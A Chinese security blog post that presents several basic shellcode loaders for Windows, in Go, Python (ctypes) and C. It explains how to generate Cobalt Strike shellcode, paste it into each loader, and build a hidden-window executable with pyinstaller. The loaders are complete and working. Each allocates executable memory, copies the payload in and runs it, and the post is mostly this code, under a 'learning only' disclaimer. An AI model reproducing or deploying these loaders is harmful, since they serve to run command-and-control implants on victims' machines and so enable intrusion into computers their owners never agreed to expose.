
多种基础Shellcode加载器

匿名 知攻善防实验室 2024-01-27


免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

Shellcode加载器

   

GoShellcode

   

使用 Cobalt Strike（CS）生成 shellcode

替换：把生成的 shellcode 填入加载器中的占位处（例如下文 Go 代码里的 `----shellcode----`）

去除空格与换行（下面的 Python 脚本把生成器输出的多行 shellcode 压成一行，便于粘贴）

def remove_whitespace_and_newlines(text):
    """Return ``text`` with every space, LF and CR character removed.

    Only those three characters are dropped; tabs and other whitespace
    are kept. The purpose is to collapse generator output that is wrapped
    across several lines into one contiguous string.
    """
    return "".join(ch for ch in text if ch not in " \n\r")



# Paste the generator's (usually multi-line) output between the quotes; the
# collapsed one-line result is what gets pasted into the loader source.
input_text = """ shellcode """

output_text = remove_whitespace_and_newlines(input_text)
print(output_text)

Go语言

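package main

import (
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
)

// Win32 allocation flags passed to VirtualAlloc.
const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40 // writable + executable region (not W^X)
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")

	// Embedded payload used when no file path is given on the command line.
	// The "----shellcode----" token is a placeholder, not valid Go: replace it
	// with the raw byte list produced by the generator before building.
	shellcode_buf = []byte{
		0xfc, 0x48, ----shellcode----, 0xd5,
	}
)

// checkErr terminates the process when a call reported a real failure.
//
// syscall.(*Proc).Call always returns a non-nil error: on success it is
// syscall.Errno(0) (ERROR_SUCCESS). The original compared the English message
// text "The operation completed successfully.", which is fragile because
// Errno.Error falls back to the system default language when English message
// resources are unavailable; comparing the numeric errno is locale-independent.
func checkErr(err error) {
	if err == nil {
		return
	}
	if errno, ok := err.(syscall.Errno); ok && errno == 0 {
		return
	}
	println(err.Error())
	os.Exit(1)
}

// main allocates an RWX buffer, copies the payload into it and jumps to it.
// The payload comes from the file named by the first argument if present,
// otherwise from shellcode_buf. The jump never returns unless the payload does.
func main() {
	shellcode := shellcode_buf
	if len(os.Args) > 1 {
		data, err := ioutil.ReadFile(os.Args[1])
		checkErr(err)
		shellcode = data
	}

	// &shellcode[0] below would panic on an empty payload (e.g. an empty file).
	if len(shellcode) == 0 {
		println("empty shellcode")
		os.Exit(1)
	}

	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
		// errno 0 with a NULL address would otherwise fall through to a copy into NULL.
		println("VirtualAlloc returned NULL")
		os.Exit(1)
	}

	_, _, err = RtlCopyMemory.Call(addr, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	checkErr(err)

	// Transfer control to the buffer on the current thread.
	syscall.Syscall(addr, 0, 0, 0, 0)
}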

测试上线

PythonShellcode

   


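#!/usr/bin/python
"""Minimal ctypes shellcode runner (Windows only).

Allocates an RWX region with VirtualAlloc, copies the payload in with
RtlMoveMemory, starts it on a new thread with CreateThread and blocks until
that thread exits.
"""
import ctypes

# Raw payload bytes. A bytes literal works on Python 2 and 3; the original
# bytearray("...") form is Python-2-only and raises TypeError on Python 3.
shellcode = bytearray(b"\xfc\xe8")

kernel32 = ctypes.windll.kernel32

# Without explicit restype/argtypes ctypes treats every return value and
# argument as a C int. The original wrapped pointers and handles in c_int,
# which silently truncates 64-bit addresses on x64 Python; declare the real
# signatures so pointer-sized values round-trip intact.
kernel32.VirtualAlloc.restype = ctypes.c_void_p
kernel32.VirtualAlloc.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32]
kernel32.RtlMoveMemory.restype = None
kernel32.RtlMoveMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t]
kernel32.CreateThread.restype = ctypes.c_void_p
kernel32.CreateThread.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p,
                                  ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p]
kernel32.WaitForSingleObject.restype = ctypes.c_uint32
kernel32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_uint32]

MEM_COMMIT_RESERVE = 0x3000       # MEM_COMMIT | MEM_RESERVE, as in the original 0x3000
PAGE_EXECUTE_READWRITE = 0x40     # writable + executable region (not W^X)
INFINITE = 0xFFFFFFFF             # same bit pattern as the original c_int(-1)

ptr = kernel32.VirtualAlloc(None, len(shellcode), MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
if not ptr:
    # The original continued with a NULL pointer and crashed inside RtlMoveMemory.
    raise ctypes.WinError()

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
kernel32.RtlMoveMemory(ptr, buf, len(shellcode))

thread_id = ctypes.c_uint32(0)
ht = kernel32.CreateThread(None, 0, ptr, None, 0, ctypes.byref(thread_id))
if not ht:
    raise ctypes.WinError()
kernel32.WaitForSingleObject(ht, INFINITE)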

进行编译

python pyinstaller.py -F -w pyshellcode.py

C/C++Shellcode

   


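/* Minimal MSVC shellcode runner: the payload lives in a global array and is
 * invoked through a function-pointer cast.
 *
 * Caveat: buf sits in an ordinary writable data section. In a process where
 * DEP/NX is enforced (the norm on current Windows, and always for x64),
 * jumping into it raises an access violation; the bytes must be placed in an
 * executable section or their protection changed (e.g. VirtualProtect) first.
 */
unsigned char buf[] = "shellcode"; /* placeholder: replace with the raw payload bytes */

/* Link as a GUI-subsystem binary but keep the console CRT entry point, so no
 * console window is shown. MSVC-specific; other compilers ignore the pragma. */
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

/* Implicit-int `main()` was removed in C99 and is not valid C++; declare it
 * properly. The call never returns unless the payload does. */
int main(void)
{
    ((void (*)(void))buf)();
    return 0;
}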


